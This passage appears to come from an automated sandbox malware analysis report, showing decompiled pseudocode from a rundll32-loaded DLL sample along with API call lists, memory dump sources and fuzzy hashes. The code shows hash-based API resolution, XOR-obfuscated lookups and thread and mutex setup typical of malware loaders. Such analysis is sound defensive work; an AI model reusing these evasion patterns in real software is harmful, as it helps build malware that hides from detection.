                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				void* _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
